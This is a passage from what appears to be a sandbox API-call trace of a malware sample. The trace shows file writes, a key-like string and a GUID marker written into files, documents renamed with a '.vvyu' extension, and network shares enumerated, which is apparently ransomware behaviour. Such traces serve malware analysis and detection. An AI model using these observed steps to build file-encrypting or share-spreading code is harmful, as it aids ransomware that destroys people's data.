hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bc0 | out: hHeap=0x2c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0200.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6bc0 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26668 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6b00 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x29dcde8 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a197b8 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0200.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0200.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bc0 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0200.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0200.482] GetCurrentThreadId () returned 0x5d8 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af6260 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42628 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0200.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.483] GetCurrentThreadId () returned 0x5d8 [0200.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x29dcde8 [0200.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0200.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0200.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0200.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6bc0 [0200.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7d70 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0200.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0200.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0200.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b48 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26668 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6bd8 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6bf0 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b78 [0200.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b60 | out: hHeap=0x2c0000) returned 1 [0200.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7630 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf6e0 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bc0 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a199e8 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bf0 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf8f0 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x29dcde8 [0200.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0200.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0200.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0200.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a199e8 | out: hHeap=0x2c0000) returned 1 [0200.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0200.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0200.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0200.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0200.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0200.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0200.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0200.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8f0 | out: hHeap=0x2c0000) returned 1 [0200.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7d70 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6bd8 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26668 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b48 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0200.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42628 | out: hHeap=0x2c0000) returned 1 [0200.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0200.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ba8 | out: hHeap=0x2c0000) returned 1 [0200.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adeb30 | out: hHeap=0x2c0000) returned 1 [0200.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0200.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0200.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0200.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0200.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0200.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0200.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0200.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0200.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0200.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0200.495] WriteFile (in: hFile=0x52c, lpBuffer=0x2afb168*, nNumberOfBytesToWrite=0xbb09, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2afb168*, lpNumberOfBytesWritten=0x2f9fb14*=0xbb09, lpOverlapped=0x0) returned 1 [0200.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2afb168 | out: hHeap=0x2c0000) returned 1 [0200.496] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xbb0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.496] WriteFile (in: hFile=0x52c, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0200.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0200.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0200.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0200.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0200.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0200.497] WriteFile (in: hFile=0x52c, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.498] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.498] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.498] CloseHandle (hObject=0x52c) returned 1 [0200.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x2af9180 [0200.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x2af3f88 [0200.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af9180 | out: hHeap=0x2c0000) returned 1 [0200.500] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\qSY7qB q Psxa19MFF.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\qsy7qb q psxa19mff.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\RAN3RZLWQzdFaTXUwx\\qSY7qB q Psxa19MFF.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ran3rzlwqzdfatxuwx\\qsy7qb q psxa19mff.pps.vvyu")) returned 1 [0200.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0200.502] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0200.505] FindNextFileW (in: hFindFile=0x2a05e28, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d417990, ftCreationTime.dwHighDateTime=0x1d8a0b3, ftLastAccessTime.dwLowDateTime=0x61264b00, ftLastAccessTime.dwHighDateTime=0x1d8a517, ftLastWriteTime.dwLowDateTime=0x61264b00, ftLastWriteTime.dwHighDateTime=0x1d8a517, nFileSizeHigh=0x0, nFileSizeLow=0xbb0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qSY7qB q Psxa19MFF.pps", cAlternateFileName="QSY7QB~1.PPS")) returned 0 [0200.505] FindClose (in: hFindFile=0x2a05e28 | out: hFindFile=0x2a05e28) returned 1 [0200.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0200.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0200.506] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0200.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0200.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9248 | out: hHeap=0x2c0000) returned 1 [0200.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d010 | out: hHeap=0x2c0000) returned 1 [0200.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7180 | out: hHeap=0x2c0000) returned 1 [0200.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29ade80 | out: hHeap=0x2c0000) returned 1 [0200.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0200.508] SendMessageW (hWnd=0x30144, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 [0200.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4658 | out: hHeap=0x2c0000) returned 1 [0200.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424a0 | out: hHeap=0x2c0000) returned 1 [0200.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a73510 | out: hHeap=0x2c0000) returned 1 Thread: id = 163 os_tid = 0x5a4 [0178.370] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x309fee0 | out: lphEnum=0x309fee0*=0x2a05d28) returned 0x0 [0178.419] WNetEnumResourceW (in: hEnum=0x2a05d28, lpcCount=0x309fedc, lpBuffer=0x2ad2260, lpBufferSize=0x309fed8 | out: lpcCount=0x309fedc, lpBuffer=0x2ad2260, lpBufferSize=0x309fed8) returned 0x0 [0178.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05750 [0178.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05798 [0178.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0178.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a057e0 [0178.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05828 [0178.419] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2ad2260, lphEnum=0x309fe28 | out: lphEnum=0x309fe28*=0x2e6248) returned 0x0 [0178.440] WNetEnumResourceW (in: hEnum=0x2e6248, lpcCount=0x309fe24, lpBuffer=0x2ad82a8, lpBufferSize=0x309fe20 | out: lpcCount=0x309fe24, lpBuffer=0x2ad82a8, lpBufferSize=0x309fe20) returned 0x103 [0178.440] WNetCloseEnum (hEnum=0x2e6248) returned 0x0 [0178.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05798 | out: hHeap=0x2c0000) returned 1 [0178.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05750 | out: hHeap=0x2c0000) returned 1 [0178.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05750 [0178.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05798 [0178.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x2ff060 [0178.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05870 [0178.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a058b8 [0178.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05828 | out: hHeap=0x2c0000) returned 1 [0178.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a057e0 | out: hHeap=0x2c0000) returned 1 [0178.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0178.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a057e0 [0178.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05828 [0178.442] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2ad2280, lphEnum=0x309fe28 | out: lphEnum=0x309fe28*=0x309fe44) returned 0x4b8 [0199.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05798 | out: hHeap=0x2c0000) returned 1 [0199.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05750 | out: hHeap=0x2c0000) returned 1 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x2f5b18 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05750 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05798 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adeaa0 [0199.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adeae8 [0199.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a058b8 | out: hHeap=0x2c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05870 | out: 